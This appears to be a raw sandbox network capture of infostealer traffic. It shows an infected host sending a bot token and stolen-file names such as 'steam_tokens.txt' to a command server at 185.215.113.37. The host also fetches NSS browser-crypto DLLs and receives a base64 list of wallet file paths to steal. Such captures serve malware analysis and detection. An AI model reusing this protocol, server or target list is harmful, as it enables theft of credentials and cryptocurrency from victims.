Sep 27, 2024 01:28:19.680094957 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDBKKFHIEGDHJKECAAKK Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 31 33 30 62 66 34 65 64 63 61 61 39 30 66 37 64 39 38 32 34 64 63 64 30 62 61 64 65 62 35 65 66 37 37 34 62 38 34 66 66 66 34 30 62 39 39 36 39 62 32 66 65 63 35 63 35 30 37 63 39 65 65 63 66 38 64 63 36 36 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------GDBKKFHIEGDHJKECAAKKContent-Disposition: form-data; name="token"52f130bf4edcaa90f7d9824dcd0badeb5ef774b84fff40b9969b2fec5c507c9eecf8dc66------GDBKKFHIEGDHJKECAAKKContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GDBKKFHIEGDHJKECAAKKContent-Disposition: form-data; name="file"------GDBKKFHIEGDHJKECAAKK--
Sep 27, 2024 01:28:20.390130997 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:28:19 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 27, 2024 01:28:20.788553953 CEST	93	OUT	GET /0d60be0de163924d/freebl3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 27, 2024 01:28:21.006623030 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:28:20 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Sep 27, 2024 01:28:21.888216972 CEST	93	OUT	GET /0d60be0de163924d/mozglue.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 27, 2024 01:28:22.106481075 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:28:21 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Sep 27, 2024 01:28:22.532505035 CEST	94	OUT	GET /0d60be0de163924d/msvcp140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 27, 2024 01:28:22.752549887 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:28:22 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Sep 27, 2024 01:28:23.248806000 CEST	90	OUT	GET /0d60be0de163924d/nss3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 27, 2024 01:28:23.467164993 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:28:23 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Sep 27, 2024 01:28:24.973088980 CEST	94	OUT	GET /0d60be0de163924d/softokn3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 27, 2024 01:28:25.193192005 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:28:25 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Sep 27, 2024 01:28:25.478388071 CEST	98	OUT	GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 27, 2024 01:28:25.696691036 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:28:25 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Sep 27, 2024 01:28:26.587692022 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHJKKECFIECAKECAFBGC Host: 185.215.113.37 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Sep 27, 2024 01:28:27.475850105 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:28:26 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=84 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 27, 2024 01:28:27.531598091 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJKFHDBKFCAAECBFIDHJ Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 44 42 4b 46 43 41 41 45 43 42 46 49 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 31 33 30 62 66 34 65 64 63 61 61 39 30 66 37 64 39 38 32 34 64 63 64 30 62 61 64 65 62 35 65 66 37 37 34 62 38 34 66 66 66 34 30 62 39 39 36 39 62 32 66 65 63 35 63 35 30 37 63 39 65 65 63 66 38 64 63 36 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 44 42 4b 46 43 41 41 45 43 42 46 49 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 44 42 4b 46 43 41 41 45 43 42 46 49 44 48 4a 2d 2d 0d 0a Data Ascii: ------IJKFHDBKFCAAECBFIDHJContent-Disposition: form-data; name="token"52f130bf4edcaa90f7d9824dcd0badeb5ef774b84fff40b9969b2fec5c507c9eecf8dc66------IJKFHDBKFCAAECBFIDHJContent-Disposition: form-data; name="message"wallets------IJKFHDBKFCAAECBFIDHJ--
Sep 27, 2024 01:28:27.756454945 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:28:27 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Sep 27, 2024 01:28:27.759618998 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJDBFBKKJDHJKECBGDAK Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 31 33 30 62 66 34 65 64 63 61 61 39 30 66 37 64 39 38 32 34 64 63 64 30 62 61 64 65 62 35 65 66 37 37 34 62 38 34 66 66 66 34 30 62 39 39 36 39 62 32 66 65 63 35 63 35 30 37 63 39 65 65 63 66 38 64 63 36 36 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 2d 2d 0d 0a Data Ascii: ------HJDBFBKKJDHJKECBGDAKContent-Disposition: form-data; name="token"52f130bf4edcaa90f7d9824dcd0badeb5ef774b84fff40b9969b2fec5c507c9eecf8dc66------HJDBFBKKJDHJKECBGDAKContent-Disposition: form-data; name="message"ybncbhylepme------HJDBFBKKJDHJKECBGDAK--
Sep 27, 2024 01:28:27.986325979 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:28:27 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 32 30 30 63 0d 0a 2a 2e 70 6c 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 61 72 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 62 72 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 65 63 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 65 67 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 69 6e 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 70 74 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 61 63 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 62 64 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f [TRUNCATED] Data Ascii: 200c.pl<br> 1.google.com.google.com<br>.ar<br> 1.google.com.google.com<br>.br<br> 1.google.com.google.com<br>.ec<br> 1.google.com.google.com<br>.eg<br> 1.google.com.google.com<br>.in<br> 1.google.com.google.com<br>.pt<br> 1.google.com.google.com<br>.ac<br> 1.google.com.google.com<br>.bd<br> 1.google.com.google.com<br>.zm<br> 1.google.com.google.com<br>.ve<br> 1.google.com.google.com<br>.pk<br> 1.google.com.google.com<br>.rs<br> 1.google.com.google.com<br>.ph<br> 1.google.com.google.com<br>.mx<br> 1.google.com.google.com<br>.in<br> 1.google.com.google.com<br>.th<br> 1.google.com.google.com<br>.id<br> 1.google.com.google.com<br>.tr<br> 1.google.com.google.com<br>.cz<br> 1.google.com.google.com<br>.io<br> 1.google.com.google.com<br>.dz<br> 1.google.com.google.com<br>.de<br> 1.google.com.google.com<br>.kr<br> 1.google.com.google.com<br>.ma<br> 1.google.com.google.com<br>.jp<br> 1.google.com
Sep 27, 2024 01:28:28.003597975 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAFIDGCFHIEHJJJJECAK Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 41 46 49 44 47 43 46 48 49 45 48 4a 4a 4a 4a 45 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 31 33 30 62 66 34 65 64 63 61 61 39 30 66 37 64 39 38 32 34 64 63 64 30 62 61 64 65 62 35 65 66 37 37 34 62 38 34 66 66 66 34 30 62 39 39 36 39 62 32 66 65 63 35 63 35 30 37 63 39 65 65 63 66 38 64 63 36 36 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 49 44 47 43 46 48 49 45 48 4a 4a 4a 4a 45 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 49 44 47 43 46 48 49 45 48 4a 4a 4a 4a 45 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------AAFIDGCFHIEHJJJJECAKContent-Disposition: form-data; name="token"52f130bf4edcaa90f7d9824dcd0badeb5ef774b84fff40b9969b2fec5c507c9eecf8dc66------AAFIDGCFHIEHJJJJECAKContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AAFIDGCFHIEHJJJJECAKContent-Disposition: form-data; name="file"------AAFIDGCFHIEHJJJJECAK--
Sep 27, 2024 01:28:28.715806961 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:28:28 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
